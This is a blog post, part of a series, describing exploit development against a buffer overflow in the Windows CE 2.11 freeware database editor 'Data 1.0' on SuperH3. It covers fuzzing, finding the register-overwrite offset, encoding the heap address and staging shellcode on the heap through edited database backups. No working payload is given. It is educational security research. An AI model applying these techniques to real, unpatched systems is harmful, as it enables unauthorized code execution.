Windows CE SuperH3 Exploit Development Part 4: Buffer Overflows Take Two, Heap Spritzing, and Turning Lessons Learned into Success

Elias Augusto
13 min readMar 26, 2019

--

Welcome back to SH3 exploit development! Sorry if this part of the series is a bit more informal than the last few. I’m very excited and I want to show you all everything. I’m just going to get into it, I found another buffer overflow that overwrites the PC, but this time there’s also ample space in memory to store shellcode, and I can actually point to it!

This isn’t the only program I’ve been testing while I’ve been gone. Freeware Windows CE 2.11 programs seem to be lousy with buffer overflows. There’s no SEH and program exception handlers can be bypassed without much effort. The main obstacle in is that the vast majority of these buffer overflows are Unicode filtered. This poses some issues when it comes to shellcoding, but I have careful research on my side this time.

Onto the tutorial! I’ll show you why I chose this program, how I found this overflow, how I constructed and tested the skeleton payload, and my plan for the shellcode.

Selection

This time around I guaranteed that I would eventually find an exploitable overflow, whether vanilla or heap-based, by testing as many freeware programs as I could. I chose portable executables instead of installable CAB files this time because I could reverse engineer them without extracting the PE files and transfer them without worrying about dependencies. I analyzed about five, but I put the buffer overflow analysis on pause for most of them. I had success with the first two programs I looked at, so I decided to focus on those first. One is the subject of this article, and the other will be covered in an upcoming piece on heap overflows.

The program I eventually chose is called “Data 1.0”. It’s a minimalist Windows CE database editor written by a “Micro Cheng”. It allows for the creation of new databases with predefined fields. It can be found on HPCFactor.com (account required for download):

Update: A slightly newer version of this software (1.08) exists, but I am unsure whether it contains the same vulnerability. It can be downloaded from the developer’s website:

The first step I took was connecting to the Windows CE PDA using ActiveSync 3.5 and open it up with what is in my opinion Embedded Visual Tools’ saving grace, the Heap Walker.

God the heap walker is so cool!

I then created a document detailing all of the ways to get user input onto the heap and persistence techniques.

I soon figured out three key things:

  • Every time the program opens a database, all of it’s records are immediately loaded onto the heap in full.
  • Every record except for “Name” and “Home Telephone” is stored in a different 500-ish byte chunks on the heap.
  • Every database that is loaded onto the heap will have it’s records loaded into chunks at the same offsets in program memory every time that specific database is opened. If I find data from a record at address 0x00039000, it will always be at 0x00039000 if I open up the program and load that database.

I figured that if I could overwrite the EIP, storing the shellcode in the heap would be relatively simple. I didn’t know much about Windows CE 2.11 defenses other than the relative lack thereof, so I decided to use the Radare2 tool Rabin2 to figure out what sort of protections this PE had.

Authors Note: I use PC and EIP interchangeably in this guide. Old habits die hard I guess, but they’re basically the same for vanilla buffer overflow purposes.

It only had relocs, which was fine because I was dealing with offsets, not fixed addresses. I then moved onto the debugging phase to look for an overwrite.

Debugging

Scripting capabilities on Windows CE 2.11 are extremely limited, especially when attempting to inject data into a GUI application. That’s why I use some good, old fashioned manual fuzzing to overwrite the EIP. I created a file with strings of A’s from 50 to 2500, and I usually just try to paste them into whichever input I can.

I learned how to use the screenshot tool! Also a great feature of EVT

Author’s Note: I avoided the database header because I wanted to create a valid database to test heap storage. Here I didn’t inject into the database “Name” category, but I’ve tested both the database header and the “Name” category, same story as all of the other inputs.

This time I sort of arbitrarily decided to use G’s rather than A’s. I started out with a 500 character “G” string in one of the programs, and got this exception:

Hm…that’s indicative of heap trouble rather than vanilla overwrites, but I knew the register window would tell me more.

Ok, so I knew that the PC (for our purposes the EIP) and the PR (stores the return address) were being overwritten, and I knew from prior experience that they’re always overwritten at the same offset, but I didn’t want to overwrite r8, r9, or overflow the heap. Note that here the stack frame pointer for the stack is also zeroed, but that doesn’t really matter for our purposes. I needed an offset that would only overwrite the PC and PR, nothing else.

Using the pattern creator in the Metasploit toolset, I generated a pattern that I then transferred to the PDA.

I pasted it in the buffer and, using the gnarly Unicode text that overwrite several of the registers, tried to figure out the offset.

This wasn’t my first rodeo, so I knew how to use the characters around the offset to construct something that I could send to pattern_offset.rb.

I had an “A”, a “6”, a “5”, and an “i”. Because I know how the pattern generator works and that the first byte into the PC in an overwrite is the last one displayed, I was able to figure out pretty easily that I was looking at “i5A”

I typed it in incorrectly here, but I still got the correct offset, so I was fine

The offset was 256 (characters, not bytes). Through some more testing I determined that every category had the same offset, and that PC and PR got overwritten by the 257th and 258th bytes without overwriting any other register.

Now I was faced with an addressing challenge. I could only address using valid Unicode, but the heap offset started with 0x0003. 0x03 is a valid ASCII character, the end of transmission character. It is not printable, and in ssh (as I learned the hard way) it is interchangeable with Ctrl+C. Using enough database entries with enough stored data, I could theoretically push the heap into a printable ASCII address, but I was afraid that this would crash the program. Instead, I tested a couple different strategies for making non-printable ASCII into printable Unicode. The most successful one, which I will share with you, involved some hex editing.

From this point on, most of the files that I had to transfer could not be transferred using a CF card while also ensuring data integrity during transfer. This goes for the hex file and the database files that will be discussed later. To ensure that the files transferred correctly, I created a shared folder using ActiveSync 3.5.

After doing this, I opened up a hex editor and created a file with nothing other than a 03 inside of it.

I then transferred this file over to the PDA and copied the character.

Author’s Note: What is actually pictured here is 0x2F and 0x05. This is a different text file containing an offset that will be used later in this post. I’m using this file because my sync folder got corrupted in a tragic accident and I didn’t want to re-transfer it. The concept is the same.

I appended two of them to the end of my 256 character D string, and to my surprise, this worked! I was able to transfer a non-printable ASCII character as valid Unicode using nothing but the weird box thingy that all non-recognized characters have!

The disparity pictured here between the valid heap address in the PC and the one that starts with a 240 in the disassembly window is the relocs acting. If we went to the address in disassembly in the memory window, we’d see that it was on the heap.

Now I just needed data to point at, the skeleton payload itself and it’s address to overwrite the PC with.

Heap Spritzing

My only problem now was embedding shellcode in the heap. I couldn’t use the same method I used previously for non-printable characters, but I eventually figured out that I could just back up the heap using DBBackup (Also from HPCFactor), put it in the Synced Folder, edit the data using a hex editor, and transfer it back using the restore option.

I learned the hard way that I could not change the length of the database. I also quickly figured out that if I made a database of just shellcode, Data.exe wouldn’t be able to process it. Instead, I designed the database like this:

  • 25 entries, 23 usable entries.
  • Names are numbers, all have to be written in order or the data will not restore in the correct order and the shellcode will not be processed.
  • Entries “One” and “TwentyFive” are full of J’s in every category except for the name.
  • Every other entry is full of X’s.

Because I could fit 255 characters in every entry, this gave me 82,110 bytes of usable data in 510 byte chunks. I called this method “Heap Spritzing” because it’s reminiscent of a classic heap spray attack, but on a much smaller scale. I just wanted an easy to point to address. The X’s were used as markers, I rewrote them with “00 90”. This was sort of a symbolic thing, as the nop in SH3 is “0x9000”, but this is not executable due to the null bytes.

Author’s Note: I actually determined that I couldn’t inject ASCII shellcode this way by attempting to use 1361 (mov r1,r1), which I figured would serve as an alternative nop. Crashed the program, overwrote r11, didn’t explore this further.

I then restored the database with the shellcode intact. Using the heap walker, I found an offset that I could point at pretty easily, 0x0005002F, which is just two valid ASCII characters. I transferred them over using the same method as before, set the program up in the debugger, and sent the payload.

I was able to verify in the memory, disassembly, and register windows without any breakpoints that I was pointing to our space. I will note that the heap view shows the location off by one byte, which is important to consider when placing shellcode.

Author’s note: I did this without breakpoints out of necessitiy, not by choice. The inability to move to an offset in the disassembly window and the fact that when testing some programs the debugger crashes if you scroll too high made breaking in the heap infeasible. However, if you have enough time to scroll up to the heap and the debbugger doesn’t crash on you, nothing is stopping you from setting heap breakpoints. This is demonstrated in the “Security Warriors” chapter on Windows CE software cracking.

Shellcode Design

My next step is designing the actual shellcode. This bit is going to be difficult, because to my knowledge nobody has been in this exact scenario before. I can’t generate a ready-made payload, nor can I wrap the shellcode to eliminate the Unicode issue, because I’m exploiting a program running on an esoteric RISC processor. ARM assembly is similar to SH3 assembly, but the scenario is different. Generally ARM shellcode is written for linux systems, and ARM Windows CE shellcode doesn’t usually target Unicode filtered buffers. For this reason I’ll be drawing knowledge from sources such as Unicode filter bypass tutorials, ARM shellcoding tutorials, and existing exploits for later versions of Windows CE running on ARM processors. I’ve listed a few of these in the “Sources” section below.

To do anything visible I’ll also need to load the CE coredll, but ARM shellcoders have found methods that are similar to the standard shellcode method of loading a system dll. Analyzing other Windows CE 2.11 programs and the DLL itself will get me some of the offsets I need in order to access functions.

I have two main choices of assembler for generating shellcode: the Reneas C/C++ Compiler for the SuperH Line, which comes with an assembler, or the on-device gcc assembler for the JLime Linux distribution. They both spit out ELF files that I can analyze easily, so either one is fine. I could also try to do something with Visual Studio. I have a couple of options.

My design idea is simple. Because I’m working with a lot of smallish chunks of memory, I want to do an “omlette egghunter”, where each segment of the shellcode includes an egghunter to search for a subsequent segment. I can’t rely on SEH to help me search memory, so this is going to be interesting. My hope is to either display a popup or open calc.exe (a classic PoC). Whichever is simpler. If all else fails, I can just use a malware-like technique where I inject the shellcode into the process memory. That way I only really need one egghunter. In the next article I will be constructing a tester for this shellcode and explaining the shellcode itself. After I successfully develop the shellcode, my plan is to create a VBScript (for no reason other than nostalgia, because that’s what this whole project is fueled by) to generate all of the files necessary for the exploit to work. Until next time!

Update:

I have the program that runs the shellcode done and working. Currently it’s just a nop sled, but I also put a few heap chunks full of non-functional nop sleds in there so that I can replace them with my segmented “omelette” egghunters when I’m ready to test the ASCII and Unicode versions of the final payload.

I was able to use breakpoints in the disassembly window to ensure that the shellcode functioned correctly this time! Progress!

Author’s Note: The Embedded Visual Tools debugger configuration stuff I gloss over in this article is covered in more depth in previous parts of this series. I picked the last one I did because it covers some of the mistakes I made during the first attempt at one of these exploits using this debugger.

Link to DBBackup:

Sources:

--

--

Elias Augusto

Enjoys edev, cyber forensics, hardware hacking, and RE, former CACI BIT Systems intern, GREM, Security+